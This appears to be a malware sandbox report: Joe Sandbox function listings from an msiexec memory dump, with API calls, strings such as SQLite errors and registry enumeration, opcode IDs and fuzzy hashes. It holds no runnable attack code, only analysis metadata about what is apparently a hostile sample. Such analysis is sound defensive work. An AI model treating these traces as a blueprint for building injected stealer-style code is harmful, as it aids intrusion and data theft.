                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesErrorFileLastSleep$free
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1470729244-0
                                                                                                                                                                                                          • Opcode ID: 675b33b2af9dcb3c53510e193b2b2860c3ea87b357ed647995c74d1772aabefc
                                                                                                                                                                                                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 675b33b2af9dcb3c53510e193b2b2860c3ea87b357ed647995c74d1772aabefc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                                          Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1331804452-0
                                                                                                                                                                                                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                                          Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID: advapi32.dll
                                                                                                                                                                                                          • API String ID: 2012295524-4050573280
                                                                                                                                                                                                          • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                                          • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                                          Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                          • <%s>, xrefs: 004100A6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                          • API String ID: 3473751417-2880344631
                                                                                                                                                                                                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                          Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                          • API String ID: 2521778956-791839006
                                                                                                                                                                                                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                          Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintfwcscpy
                                                                                                                                                                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                          • API String ID: 999028693-502967061
                                                                                                                                                                                                          • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                                          Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                          • API String ID: 2618321458-3614832568
                                                                                                                                                                                                          • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                                          Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFilefreememset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2507021081-0
                                                                                                                                                                                                          • Opcode ID: ea0ff07029848add1e185646dd88dbb6c2c853951c2e6fbb7239dcf5113ebac3
                                                                                                                                                                                                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea0ff07029848add1e185646dd88dbb6c2c853951c2e6fbb7239dcf5113ebac3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                                          Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                                          • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                                          • free.MSVCRT ref: 00417544
                                                                                                                                                                                                          • free.MSVCRT ref: 00417562
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4131324427-0
                                                                                                                                                                                                          • Opcode ID: eeddbaa8163b175ede4803737d515952d7f2f948772a4cc0436fa9d80e9c9619
                                                                                                                                                                                                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: eeddbaa8163b175ede4803737d515952d7f2f948772a4cc0436fa9d80e9c9619
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                                          Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                                                          • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                                                          • free.MSVCRT ref: 0041822B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PathTemp$free
                                                                                                                                                                                                          • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                          • API String ID: 924794160-1420421710
                                                                                                                                                                                                          • Opcode ID: 264650abee42f12a8168c60520d94c93615684aca84a1282326acd03e30c5268
                                                                                                                                                                                                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 264650abee42f12a8168c60520d94c93615684aca84a1282326acd03e30c5268
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                          Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                                                                                                          • API String ID: 313946961-1552265934
                                                                                                                                                                                                          • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                          Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                                          • API String ID: 0-1953309616
                                                                                                                                                                                                          • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                          • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                                          Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                          • API String ID: 3510742995-272990098
                                                                                                                                                                                                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                                          Function 0040C3C3 Relevance: 7.6, APIs: 5, Instructions: 109registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                            • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1265369119-0
                                                                                                                                                                                                          • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                                          Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                          • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                          • String ID: gj
                                                                                                                                                                                                          • API String ID: 1297977491-4203073231
                                                                                                                                                                                                          • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                                          Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                                                                                                          • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@$free
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2241099983-0
                                                                                                                                                                                                          • Opcode ID: 2810039f6bc4ad30ad174465d1322529e8fb666e9e7d33f144de14c935b4fe95
                                                                                                                                                                                                          • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2810039f6bc4ad30ad174465d1322529e8fb666e9e7d33f144de14c935b4fe95
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                                          Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                                          • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                                          • free.MSVCRT ref: 004174E4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4053608372-0
